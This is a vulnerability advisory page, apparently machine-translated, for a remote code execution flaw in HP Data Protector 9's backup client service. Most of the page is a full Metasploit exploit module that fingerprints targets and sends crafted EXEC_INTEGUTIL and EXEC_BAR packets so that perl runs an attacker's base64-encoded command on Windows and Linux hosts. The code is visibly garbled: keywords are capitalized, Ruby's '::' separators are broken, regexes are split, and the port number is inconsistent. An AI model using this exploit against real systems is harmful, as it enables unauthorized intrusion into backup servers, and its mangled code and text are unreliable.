HP Data Protector EXEC_INTEGUTIL Remote Code Execution Vulnerability

HP Data Protector EXEC_INTEGUTIL Remote Code Execution Vulnerability

Release date:
Updated on:

Affected Systems:
HP Data Protector 9
Description:
HP OpenView Storage Data Protector is a software that automatically backs up and recovers a single server in an enterprise environment. It supports disk Storage or tape Storage targets.

HP Data Protector 9 triggers a vulnerability in the Backup client service when processing the EXEC_INTEGUTIL message. This service listens to TCP/555 by default, after successful exploitation, EXEC_INTEGUTIL data packets can be used to execute arbitrary code.

<* Source: Aniway. Anyway
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
##
# This module requires Metasploit: http // metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking

Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Powershell

Def initialize (info = {})
Super (update_info (info,
'Name' => 'hp Data Protector EXEC_INTEGUTIL Remote Code Execution ',
'Description' => % q {
This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
In the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
Request allows to execute arbitrary commands from a restricted directory. Since it
Des a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute
Arbitrary code. On linux targets, the perl binary isn't on the restricted directory,
An EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
Data Protector for linux. This module has been tested successfully on HP Data Protector
9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
},
'Author' =>
[
'Aniway. Anyway <Aniway. Anyway [at] gmail.com> ', # vulnerability discovery
'Juan vazquez' # msf module
],
'References '=>
[
['Zdi ', '14-344']
],
'Payload' =>
{
'Disablenops' => true
},
'Defaultopexception' =>
{
# The powershell embedded payload takes some time to deploy
'Wfsdelay' => 20
},
'Targets' =>
[
['Linux 64 bits/HP Data Protector 9 ',
{
'Platform' => 'unix ',
'Arch '=> ARCH_CMD,
'Payload' => {
'Compat' => {
'Payloadtype' => 'cmd cmd_bash ',
'Requiredcmd' => 'perl gawk bash-tcp openssl python generic'
}
}
}
],
['Windows 64 bits/HP Data Protector 9 ',
{
'Platform' => 'win ',
'Arch '=> ARCH_CMD,
'Payload' => {
'Compat' => {
'Payloadtype' => 'cmd ',
'Requiredcmd' => 'powershell'
}
}
}
]
],
'Defaulttarget' => 0,
'Privileged' => true,
'Disclosuredate' => 'oct' 2 2014'
))

Register_options (
[
Opt: RPORT (1, 5555)
], Self. class)
End

Def check
Fingerprint = get_fingerprint

If fingerprint. nil?
Return Exploit: CheckCode: Unknown
End

If fingerprint = ~ /Data Protector A \. (\ d + \. \ d + )/
Version = $1
Vprint_status ("# {peer}-Windows/HP Data Protector version # {version} found ")
Elsif fingerprint = ~ /INET/
Vprint_status ("# {peer}-Linux/HP Data Protector found ")
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End

If Gem: Version. new (version) <= Gem: Version. new ('9 ')
Return Exploit: CheckCode: Appears
End

Exploit: CheckCode: Detected # there is no patch at the time of module writing
End

Def exploit
Rand_exec = rand_text_alpha (8)
Print_status ("# {peer}-Leaking the HP Data Protector directory ...")
Leak = leak_hp_directory (rand_exec)
Dir = parse_dir (leak, rand_exec)

If dir. nil?
Dir = default_hp_dir
Print_error ("# {peer}-HP Data Protector dir not found, using the default # {dir }")
Else
Unless valid_target? (Dir)
Print_error ("# {peer}-HP Data Protector directory leaked as # {dir}, # {target. name} looks incorrect, trying anyway ...")
End
End

If target. name = ~ /Windows/
# Command = payload (payload. encoded, payload_instance.arch.first, {: remove_comspec => true,: encode_final_payload => true })
Print_status ("# {peer}-Executing payload ...")
Execute_windows (payload. encoded, dir)
Else
Print_status ("# {peer}-Executing payload ...")
Execute_linux (payload. encoded, dir)
End
End

Def peer
"# {Rhost }:# {rport }"
End

Def build_pkt (fields)
Data = "\ xff \ xfe" # BOM Unicode
Fields. each do | v |
Data <"# {Rex: Text. to_unicode (v)} \ x00 \ x00"
Data <Rex: Text. to_unicode ("") # Separator
End

Data. chomp! (Rex: Text. to_unicode ("") # Delete last separator
Return [data. length]. pack ("N") + data
End

Def get_fingerprint
Fingerprint = get_fingerprint_windows
If fingerprint. nil?
Fingerprint = get_fingerprint_linux
End

Fingerprint
End

Def get_fingerprint_linux
Connect

Sock. put ([2]. pack ("N") + "\ xff \ xfe ")
Begin
Res = sock. get_once (4)
Rescue EOFError
Disconnect
Return nil
End

If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End

Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End

If res. nil?
Return nil
End

Res
End

Def get_fingerprint_windows
Connect

Sock. put (rand_text_alpha_upper (64 ))
Begin
Res = sock. get_once (4)
Rescue: Errno: ECONNRESET, EOFError
Disconnect
Return nil
End

If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End

Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End

If res. nil?
Return nil
End

Rex: Text. to_ascii (res). chop. chomp # Delete unicode last null
End

Def leak_hp_directory (rand_exec)
Connect
Pkt = build_pkt ([
"2", # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"28", # Opcode EXEC_INTEGUTIL
Rand_exec,
])

Sock. put (pkt)
Begin
Res = sock. get_once (4)
Rescue EOFError
Disconnect
Return nil
End

If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End

Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End

If res. nil?
Return nil
End

If res = ~ /No such file or directory/# Linux signature
Return res
Else # deal as windows target
Return Rex: Text. to_ascii (res). chop. chomp # Delete unicode last null
End
End

Def parse_dir (data, clue)
If data & data = ~ /The system cannot find the file specified \ .. * (..: \. *) bin \ # {clue }/
Dir = $1
Print_good ("# {peer}-HP Data Protector directory found on # {dir }")
Elsif data & data = ~ /\] \ X00 (\/. *) lbin \/# {clue} \ x00 \ [\ d \] No such file or directory/
Dir = $1
Print_good ("# {peer}-HP Data Protector directory found on # {dir }")
Else
Dir = nil
End

Dir
End

Def valid_target? (Dir)
If target. name = ~ /Windows/& dir = ~ /^ [A-Za-z]: \/
Return true
Elsif target. name = ~ /Linux/& dir. start_with? ('/')
Return true
End

False
End

Def default_hp_dir
If target. name = ~ /Windows/
Dir = 'C: \ Program Files \ OmniBack \\'
Else # linux
Dir = '/opt/omni/lbin /'
End

Dir
End

Def execute_windows (cmd, hp_dir)
Connect
Pkt = build_pkt ([
"2", # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"28", # Opcode EXEC_INTEGUTIL
"Perl.exe ",
"-I # {hp_dir} lib \ perl ",
"-MMIME: Base64 ",
"-E ",
"System (decode_base64 ('# {Rex: Text. encode_base64 (cmd )}'))"
])
Sock. put (pkt)
Disconnect
End

Def execute_linux (cmd, hp_dir)
Connect
Pkt = build_pkt ([
'2', # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
'11', # Opcode EXEC_BAR
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"../Bin/perl ",
Rand_text_alpha (8 ),
"-I # {hp_dir} lib/perl ",
'-MMIME: base64 ',
'-E ',
"System (decode_base64 ('# {Rex: Text. encode_base64 (cmd )}'))"
])
Sock. put (pkt)
Disconnect
End
End

Suggestion:
Vendor patch:

HP
--
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://itrc.hp.com

This article permanently updates the link address: